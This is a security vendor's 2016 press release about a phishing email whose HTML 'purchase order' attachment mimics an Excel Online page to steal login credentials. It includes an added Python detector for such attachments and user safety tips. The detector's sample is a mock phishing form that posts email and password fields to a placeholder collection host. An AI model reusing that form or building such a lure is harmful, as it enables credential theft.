Announcement of 22. March 2016

Order email turns out to be a phishing attack

Attackers are targeting company employees' login data.

The Locky ransomware case was not the first time that attacks have been carried out via email. Spam alone accounts for 54 billion messages sent worldwide every day (source: Eleven). These involve not only mass attacks, but also highly targeted ones. The current case is a scam that tends to target companies. The procedure is new. Recipients of the email can only tell that it is an attempt at fraud if they look very carefully. G DATA security solutions identify the attachment as Script.Trojan-Stealer.Phish.AG. The security experts at G DATA SecurityLabs have discussed the new scam in their latest blog entry.

The email that arrives in potential victims' inboxes is supposedly an order with an attachment called purchase-order.htm. But there are clues in the email that point to a scam. The company does not exist under the given name, the sender address is not real, and the text contains spelling mistakes. If the attackers gain access to an email account belonging to a private individual or a company, it can be used to send more spam. If access data belonging to a company gets out, far-reaching problems can arise, such as unauthorised access to internal company data and emails.

The file disguises itself as a type of Microsoft Excel Online Document. In the background, an Excel spreadsheet can be seen. However, this is just an image, not a spreadsheet that can be edited. The image is loaded from a server based in Hong Kong. Recipients are supposed to enter their login data into the form to start the download. After clicking on "Download", the email address and password they entered are sent to the same server in Hong Kong from which the images were downloaded – albeit to a different domain. This suggests that the entire server is being controlled by the attackers. After the data has been sent, a web page containing an error message is displayed.
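The pattern described above (an HTML attachment whose form asks for a password and submits it to a remote host, with the page decoration loaded from a remote server) can be checked for before an attachment reaches the recipient. The following is an added example, not G DATA's detection logic; the function and class names are hypothetical and the sample attachment with its example.net / example.org hosts is constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the description above; hosts are placeholders.
SAMPLE = """<html><body>
<img src="http://img.example.net/excel-bg.png">
<form method="post" action="http://collect.example.org/save.php">
<input type="text" name="email"><input type="password" name="pass">
<input type="submit" value="Download"></form></body></html>"""

class FormAudit(HTMLParser):
    """Collects remote image hosts and forms that contain a password field."""
    def __init__(self):
        super().__init__()
        self.image_hosts = set()   # hosts that <img> elements load from
        self.forms = []            # one dict per <form> element
        self._form = None          # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "img":
            host = urlparse(a.get("src") or "").hostname
            if host:
                self.image_hosts.add(host)
        elif tag == "form":
            self._form = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "").lower() == "password":
                self._form["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None

def audit_attachment(html_text):
    """Return human-readable findings for one HTML attachment."""
    parser = FormAudit()
    parser.feed(html_text)
    findings = []
    for form in parser.forms:
        target = urlparse(form["action"])
        # A local file has no reason to post a password to another host.
        if form["password"] and target.hostname:
            findings.append(f"password form posts to remote host {target.hostname}")
            if target.scheme != "https":
                findings.append("credentials would be sent without TLS")
    if findings and parser.image_hosts:
        findings.append("images loaded from: " + ", ".join(sorted(parser.image_hosts)))
    return findings
```

Calling `audit_attachment(SAMPLE)` returns three findings for the constructed attachment. The check only covers plain HTML forms; an attachment that builds its form or submits the data from script needs additional inspection.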

 

For more information, see the G DATA SecurityBlog.

 

G DATA tips for dealing with such emails securely

  • Use a comprehensive security solution and keep it up to date!
  • Use email and spam protection to block unwanted email.
  • Check emails for their plausibility. Ask yourself: Is there a reason why I/my company should receive this order from abroad? Am I the recipient of the email or is there a different address? What impression does the email make on me? Is the language OK or unusual in some way?
  • As a general rule, treat emails from unknown senders with suspicion! If an email looks very strange, here's what to do: ignore it, delete it, but under no circumstances open attachments or click on links.
  • Opening file attachments harbours risks. Attachments should first be scanned with a security solution and, if necessary, deleted without being opened. If you are uncertain, send the file to G DATA SecurityLabs for analysis without opening it.
  • Links in emails should never be clicked on without thinking. Check the URL. Many email programs show the actual target of the link when hovering the mouse over the visible link without actually clicking on it – the so-called mouse-over function. If you are uncertain, send the URL to G DATA SecurityLabs for analysis without clicking on it.
  • Emails with an HTML file attachment should be treated with great scepticism. The file format is only used for websites. It is very unusual to use it for exchanging information between individuals. The same applies to files in .js (JavaScript) format.
  • Never reply to spam email! All that a response does is indicate to the fraudsters that the address they wrote to is actually valid – and hence even more valuable to them.
  • Do not disclose any personal data – either via email or in dubious forms or on suspicious web pages!
  • In a corporate environment especially, it is worth speaking to your IT administrator or even the CISO if something looks suspicious to you!

G DATA Software AG
G DATA Campus
Königsallee 178
D-44799 Bochum

Phone: +49 234 9762-239
E-Mail: presse@remove-this.gdata.de

Kathrin Beckert-Plewka
Public Relations Manager

Phone: +49 234 9762-507
kathrin.beckert@remove-this.gdata.de

Vera Haake
Spokesperson for event & location communication

Phone: +49 234 9762-376
vera.haake@remove-this.gdata.de

Stefan Karpenstein
Public Relations Manager

Phone: +49 234 9762 - 517
stefan.karpenstein@remove-this.gdata.de